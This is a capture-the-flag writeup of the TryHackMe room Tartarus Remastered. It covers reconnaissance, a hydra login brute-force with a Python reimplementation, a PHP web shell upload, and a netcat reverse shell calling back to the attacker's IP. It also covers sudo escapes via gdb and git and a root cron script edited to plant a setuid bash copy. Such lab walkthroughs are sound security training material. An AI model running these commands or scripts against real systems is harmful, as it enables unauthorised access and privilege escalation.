Tartarus_writeup

Oct. 28, 2020


Tartarus-Remastered TryHackMe Room

Welcome back! Today I have another writeup. This time I went for a just-released room on TryHackMe called Tartarus Remastered. I hope you enjoy it!

Getting Started

Once again I’ll be using autorecon <IP> to scan this box, so leave that running or perform manual scans if you’d like. I’m going through this room on my lunch break at work, so I don’t have much time XD.

Checking Autorecon Results and gaining access.

If we look at Gobuster’s results, we see a robots.txt file that we can access:

If we look at the directory named in the Disallow entry:

If we look at FTP (the nmap scan shows anonymous login is enabled), we see something interesting:

There are directories named ... that we can access, and inside there is a file.

If we check that file we see another directory is mentioned:

We get a login form. This is getting quite familiar; we can try the same approach we used for the room called Hydra. Check that here.

We need to construct a POST request attack with hydra.

/sUp3r-s3cr3t

hydra -l userid -P credentials.txt 10.10.61.206 http-post-form "/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:F=Incorrect" -V -F -u
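The hydra line above does one thing per attempt: POST username=…&password=… to authenticate.php and treat the attempt as a failure whenever the F= string ("Incorrect") appears in the response. To make that logic visible, here is an added example (not code from the original writeup or the room) that reimplements it with the standard library against a throwaway local server standing in for authenticate.php. The planted credential userid:letmein, the four-word wordlist and the "Incorrect" marker are all constructed for the demo; only the form field names and the failure-string rule come from the hydra command.

```python
"""Manual equivalent of: hydra -l userid -P wordlist http-post-form
"/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:F=Incorrect" -F
Added example; the fake server, credential and wordlist are constructed."""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

VALID = ("userid", "letmein")   # constructed planted credential (assumption)
FAIL_MARKER = "Incorrect"       # the F= string from the hydra command


class FakeAuth(BaseHTTPRequestHandler):
    """Stand-in for authenticate.php: answers 'Incorrect ...' unless the
    posted username/password pair matches VALID."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        creds = (form.get("username", [""])[0], form.get("password", [""])[0])
        body = "Welcome back" if creds == VALID else "Incorrect username or password"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(body.encode())

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_fake_server():
    srv = HTTPServer(("127.0.0.1", 0), FakeAuth)  # port 0: any free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def try_login(url, user, password, fail_marker=FAIL_MARKER):
    """One attempt. hydra's F= rule: success means the failure string is
    absent from the response body, nothing more. If the marker can also show
    up in a successful page you get false positives, so pick it carefully."""
    data = urllib.parse.urlencode({"username": user, "password": password}).encode()
    req = urllib.request.Request(url, data=data)  # data= makes this a POST
    with urllib.request.urlopen(req) as resp:
        return fail_marker not in resp.read().decode(errors="replace")


def brute_force(url, user, wordlist, fail_marker=FAIL_MARKER):
    """Equivalent of -l USER -P wordlist -F: return the first password that
    passes the check, or None if the whole list fails."""
    for password in wordlist:
        if try_login(url, user, password, fail_marker):
            return password
    return None


def demo():
    """Run the attack against the local stand-in and return the hit."""
    srv = start_fake_server()
    try:
        url = "http://127.0.0.1:%d/sUp3r-s3cr3t/authenticate.php" % srv.server_address[1]
        wordlist = ["password", "123456", "letmein", "admin"]  # constructed
        return brute_force(url, "userid", wordlist)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("found:", demo())
```

The F= marker is the weak point of this whole technique: hydra never sees a "login succeeded" signal, only the absence of the failure text, so always confirm a reported hit by hand before building on it.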

We can also let gobuster know we have a new directory that it can explore:

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.61.206/sUp3r-s3cr3t/ -x php,txt,html,sh,cgi

If we brute-force the login request we get the following:

And if we login we get an upload form:

We can try to upload a semi-interactive php-bash and see if we can access that:

Now if we navigate back to that images/uploads/ folder, we see our file is there:

If we go ahead and click on that file we get our PHP-Bash working:

If we navigate to the home folder, we can access d4rckh folder and cat out the user flag:

Ok, so now we need to go get the root flag. Even though the semi-interactive shell we got is fine, I would like to have better access from my own terminal, so let’s try to get a reverse shell.

We start a nc -nlvp 2112 in our terminal and then we try to fire a connection in the php-bash file back to our machine:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.0.34 2112 >/tmp/f

Now that we have a reverse shell, we can navigate a bit more comfortably. If we take a look at the other folder in the home directory we see another file that mentions git.

If we run sudo -l we see that the user we have can run gdb with sudo. Let’s check GTFOBins to see if we have a way of exploiting that.

It seems there is a way to get a reverse shell, let’s try that:

Maybe I’m doing something wrong, but gdb did not work and I was still the www-data user after trying all the options listed on GTFOBins. Let’s check if we have any running cron jobs:

Indeed we have, and it is a file I saw inside d4rckh’s folder. Since that cron job is running as root, we can try to edit it so that when it runs it spawns a privileged shell back to us.

But first we really need to get gdb working so we can switch user. The idea here is to impersonate the other user, thirtytwo, and see what he can run as sudo. If we recall the file we found earlier, we know that d4rckh fixed git access for him, so we can assume thirtytwo could have privileged access to the git executable.

After checking a while on that gdb binary, it seems we can try it as follows:

sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex qu

That seems to work, and we are now the expected user which, as we thought, has access to git.

Let’s check back on GTFObins if we have anything on git to get root.

We can try to run python -c 'import pty;pty.spawn("/bin/bash");' to get a TTY shell before we try to get root.

NOTE: also run export TERM=xterm to get a more responsive terminal that for instance is able to clear the screen.

Now let’s try some of the commands suggested by GTFObins. If we check the Sudo section we get a few to try. The first one does not work at all in this case. Let’s check the second:

sudo git -p help config and then, at the pager prompt, !/bin/sh

Still, we need to adjust the command a bit: we need to explicitly set the user we want to switch to:

sudo -u d4rckh git -p help config

That seems to work and we are now the user d4rckh

Ok now let’s check that cleanup.py file that’s running as a cron job. And see if we can edit it to get us root.

NOTE: To make sure I don’t lose the original file, I ran cp cleanup.py cleanup.py.bak

Now let’s see if we can edit the file with nano:

Even though we get an error before nano opens, we are able to edit the file. We change the command being executed so that it creates a copy of bash that keeps root’s privileges, placed in a directory we can reach, so we can execute it later:

We save the file and we just wait, since the file is tied to a cronjob we need to wait for it to get executed:

If you notice, the command tells the system to copy bash to /tmp/rootbash and mark that copy setuid.

NOTE: Credits to @ratiros01 on that command, I was just failing at making that work until I came across his idea for that in one of his posts.

Let’s navigate to that temp folder and see if our bash copy is there. It is, it worked. Now we need to run that file, but we have to use the -p switch so the binary does not drop its privileges. Otherwise it would run with the permissions our current user has.
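Since cleanup.py is a Python script run by root’s cron, the edit boils down to swapping its command for one that copies bash and sets the setuid bit, then checking the result before trusting it. The following is an added example, not the room’s cleanup.py or the command from the original post: PAYLOAD is the replacement command (the /tmp/rootbash path is an assumption), is_suid_root is the check I would run on the copy before invoking it, and the demo at the bottom exercises that check on a temporary file so it can be run as an unprivileged user without touching /tmp/rootbash.

```python
"""Added example (not from the writeup): the payload a root cron job would run
and a sanity check for the SUID copy it leaves behind. Paths are assumptions."""
import os
import stat
import subprocess
import tempfile

# The command that replaces the original one in cleanup.py. Run by root, it
# leaves a root-owned copy of bash whose setuid bit makes it start with euid 0.
PAYLOAD = "cp /bin/bash /tmp/rootbash; chmod u+s /tmp/rootbash"


def run_payload():
    """What the edited cleanup.py does on the next cron tick (needs root)."""
    subprocess.run(PAYLOAD, shell=True, check=True)


def has_setuid_bit(path):
    return bool(os.stat(path).st_mode & stat.S_ISUID)


def is_suid_root(path):
    """Both conditions matter: a setuid binary owned by a normal user runs as
    that user, not root, so check the owner and the mode bit together."""
    st = os.stat(path)
    return st.st_uid == 0 and has_setuid_bit(path)


def spawn_rootbash(path="/tmp/rootbash"):
    """bash resets its effective uid to the real uid unless started with -p,
    which is why the writeup needs /tmp/rootbash -p. Returns the output of id."""
    return subprocess.run([path, "-p", "-c", "id"], capture_output=True,
                          text=True, check=True).stdout.strip()


def demo_setuid_check():
    """Unprivileged demo of the check on a temp file: no bit, then chmod 4755
    (the effect of chmod u+s on a 755 file), then the bit is visible. The file
    is owned by the caller, so is_suid_root is True only when the caller is
    root, which is exactly what the check should report."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        before = has_setuid_bit(path)
        os.chmod(path, 0o4755)
        after = has_setuid_bit(path)
        owner_check_consistent = is_suid_root(path) == (os.getuid() == 0)
        return before, after, owner_check_consistent
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo_setuid_check())
```

On the box itself the flow is: edit cleanup.py to run PAYLOAD, wait for cron, confirm with is_suid_root("/tmp/rootbash") (or ls -l, look for the s in the owner execute position and root as owner), then run /tmp/rootbash -p. A copy that shows the setuid bit but is owned by d4rckh means the cron job did not run as root and you are not getting a root shell from it.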

It worked great and we are now root! Let’s grab that flag and complete the room.

I hope you enjoyed this room as much as I did, thanks again to @ratiros01 for his post that helped me when I got stuck.

Happy hacking and thanks for stopping by!
